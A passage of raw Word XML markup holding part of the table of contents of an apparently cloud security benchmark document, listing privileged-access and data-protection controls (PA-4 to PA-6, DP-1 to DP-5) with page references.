                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449493 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00E29B76" w14:textId="789491EC" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449494" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PA-5: Set up emergency access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449494 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1072A163" w14:textId="31E2065A" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449495" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PA-6: Use privileged access solution</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449495 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18A60A31" w14:textId="5F0AD110" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449496" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.6.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449496 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34E1B3C2" w14:textId="3DCF1499" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449497" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.7.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449497 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51B9F347" w14:textId="1D2BF275" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449498" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and governance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449498 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65B6CC29" w14:textId="5DCC69CC" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449499" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PA-4: Review and reconcile user access regularly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449499 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30C32F7D" w14:textId="525B0642" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449500" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Data Protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449500 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B01AC25" w14:textId="2AE3B145" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449501" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Know and classify your data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449501 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A35EA33" w14:textId="36D919DB" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449502" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-1: Discover, classify, and label sensitive data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449502 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21666971" w14:textId="3D2D86B3" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449503" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-2: Monitor anomalies and threats targeting sensitive data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449503 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>64</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70E7CF64" w14:textId="77FD28A6" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449504" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Protect data with encryption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449504 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="080C2A24" w14:textId="0A891F53" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449505" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-3: Encrypt sensitive data in transit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449505 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>66</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55B94F77" w14:textId="4FA92FCF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449506" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-4: Enable data at rest encryption by default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449506 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="412A5E66" w14:textId="018D1C37" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449507" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DP-5: Use customer-managed key option in data at rest encryption when required</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449507 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1174448D" w14:textId="55789460" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449508" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.</w:t>
            </w:r>
            <w:r>
